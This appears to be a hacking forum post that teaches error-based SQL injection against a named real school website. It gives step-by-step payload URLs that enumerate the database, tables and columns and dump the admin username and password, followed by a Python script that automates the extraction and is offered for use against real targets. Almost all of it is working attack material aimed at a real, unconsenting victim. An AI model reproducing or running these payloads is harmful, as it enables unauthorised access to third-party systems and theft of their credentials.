This is a post I read and brought back for everyone to discuss (so if you have questions, google them, since I'm a newbie too).
victim:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
An error like this means the parameter is definitely injectable: whatever we append to pageID ends up unescaped inside the SQL statement and MySQL's error text is echoed back into the page.
//STEP 1:
/**/order/**/by/**/1-- OK
/**/order/**/by/**/2-- error; that makes it awkward, the query apparently returns only a single column, so the old union-based approach is not usable here
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21/**/order/**/by/**/2-- → Unknown column '2' in 'order clause'
So here is the query technique I read about, for exactly this kind of +order+by+1 case.
//STEP 2:
Check the version:
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
Code:
http://www.aliqbalschools.org/index....tent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
ver: 5.5.16, that works; if it's 4.x go find another target (every payload below reads information_schema, which only exists in MySQL 5.0 and later).
Get the database name:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Code:
http://www.aliqbalschools.org/index....tent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
database: iqbal_iqbal
Get the table names:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Notice the limit 0,1 part: it returns one table at a time by position, so step through 0,1 / 1,1 / ... and see which table looks important, then dump that one. Here it's limit 19,1.
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Duplicate entry 'settings~1' for key 'group_key'
table: settings
Get the columns of that table:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Step LIMIT 0,1 as before, and replace 0xTABLEHEX with the table name as a hex literal so no quotes are needed (settings = 0x73657474696e6773).
http://www.aliqbalschools.org/index....tent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Same thing here: limit 0,1, then 1,1, ... until you find what you need.
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Code:
http://www.aliqbalschools.org/index....tent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
There are columns holding the username and password (userName, passWord), so continue.
//STEP 3:
Get the data:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Code:
Replace COLUMN_NAME with "userName" and "passWord"
Replace Databasename with "iqbal_iqbal"
Replace TABLENAME with "settings"
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
With the username and password in hand, find the admin login page and log in.
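To automate the limit 0,1 / 1,1 / ... stepping from steps 2 and 3, here is an added Python helper (my example, not code from the original post): it builds the same double-query payload around any scalar subquery, parses the leaked value out of the Duplicate entry message, and walks the offsets until the error stops appearing. fake_fetch, the sample schema and the sample row are constructed stand-ins so the script runs offline; against a real target you would replace fake_fetch with a function that appends the suffix to the injectable parameter and returns the response body.

```python
import re
from typing import Callable, List, Optional

# MySQL's ER_DUP_ENTRY text as the vulnerable page echoes it; group 1 is the leaked value.
DUP_RE = re.compile(r"Duplicate entry '(.*?)~1' for key 'group_key'")


def to_hex(s: str) -> str:
    """Encode a string as a 0x.. literal so the payload needs no quote characters."""
    return "0x" + s.encode().hex()


def payload(inner: str) -> str:
    """Wrap a scalar subquery in the double-query form used in the post.

    rand(0) is seeded, so floor(rand(0)*2) always yields 0,1,1,0,1,1,...  MySQL
    evaluates the GROUP BY key once to look a group up in its temporary table and
    again when inserting it: row 1 is looked up as 'v~0' and stored as 'v~1', row 2
    hits 'v~1', row 3 is looked up as 'v~0' (miss) and inserted as 'v~1' again,
    which raises ER_DUP_ENTRY with our value inside the message.  The FROM table
    therefore needs at least three rows; information_schema.tables always has them.
    """
    return (
        " and (select 1 from (select count(*),concat((select concat(cast(("
        + inner
        + ") as char),0x7e)),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    )


def database_expr() -> str:
    return "select database()"


def table_expr(n: int) -> str:
    """n-th table of the current database (the LIMIT n,1 stepping from the post)."""
    return ("select table_name from information_schema.tables "
            f"where table_schema=database() limit {n},1")


def column_expr(table: str, n: int) -> str:
    """n-th column of `table`; the table_schema filter is an addition to the post's
    query so a same-named table in another schema does not pollute the listing."""
    return ("select column_name from information_schema.columns "
            f"where table_schema=database() and table_name={to_hex(table)} limit {n},1")


def row_expr(db: str, table: str, cols: List[str], n: int) -> str:
    """n-th row of db.table with the chosen columns joined by '~'."""
    return f"select concat_ws(0x7e,{','.join(cols)}) from {db}.{table} limit {n},1"


def extract(response: str) -> Optional[str]:
    """Leaked value, or None when no collision occurred (LIMIT past the last row makes
    the subquery NULL, so concat() is NULL and a NULL group key never collides)."""
    m = DUP_RE.search(response)
    return m.group(1) if m else None


def enumerate_values(fetch: Callable[[str], str],
                     expr_for: Callable[[int], str], limit: int = 200) -> List[str]:
    """Step LIMIT n,1 for n = 0.. until the page stops raising the duplicate error."""
    out: List[str] = []
    for n in range(limit):
        value = extract(fetch(payload(expr_for(n))))
        if value is None:
            break
        out.append(value)
    return out


def dump(fetch: Callable[[str], str], table: str, cols: List[str]) -> List[str]:
    """Step 3 of the post: learn the database name, then read every row of table."""
    db = extract(fetch(payload(database_expr())))
    return enumerate_values(fetch, lambda n: row_expr(db, table, cols, n))


# --- constructed stand-in for the target so the helper runs offline (not real data) ---
FAKE_DB = "demo_db"
FAKE_TABLES = ["pages", "settings", "users"]
FAKE_COLUMNS = {"settings": ["id", "userName", "passWord"]}
FAKE_ROWS = {"settings": [("admin", "s3cret")]}


def fake_fetch(suffix: str) -> str:
    """Emulates index.php?...&pageID=21<suffix>: the parameter is concatenated into
    SQL and MySQL errors are echoed into the HTML, the condition the post exploits."""
    m = re.search(r"limit (\d+),1", suffix)
    n = int(m.group(1)) if m else 0
    if "select database()" in suffix:
        rows = [FAKE_DB]
    elif "table_name from information_schema.tables" in suffix:
        rows = FAKE_TABLES
    elif "column_name from information_schema.columns" in suffix:
        tbl = bytes.fromhex(re.search(r"table_name=0x([0-9a-f]+)", suffix).group(1)).decode()
        rows = FAKE_COLUMNS.get(tbl, [])
    elif "concat_ws(0x7e," in suffix:
        tbl = re.search(r"from \w+\.(\w+) limit", suffix).group(1)
        rows = ["~".join(r) for r in FAKE_ROWS.get(tbl, [])]
    else:
        rows = []
    if n < len(rows):
        return f"<b>Warning</b>: Duplicate entry '{rows[n]}~1' for key 'group_key'"
    return "<html><body>normal page</body></html>"


if __name__ == "__main__":
    print("tables:", enumerate_values(fake_fetch, table_expr))
    print("settings columns:", enumerate_values(fake_fetch, lambda n: column_expr("settings", n)))
    print("settings rows:", dump(fake_fetch, "settings", ["userName", "passWord"]))
```

Two things worth keeping in mind when you use this for real: the value leaks only because the page prints MySQL's error text, so if error display is off you get nothing and have to fall back to a blind technique, and the technique is deterministic only because rand(0) is seeded; rand() without a seed would sometimes collide and sometimes not.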
If it was useful, say thanks.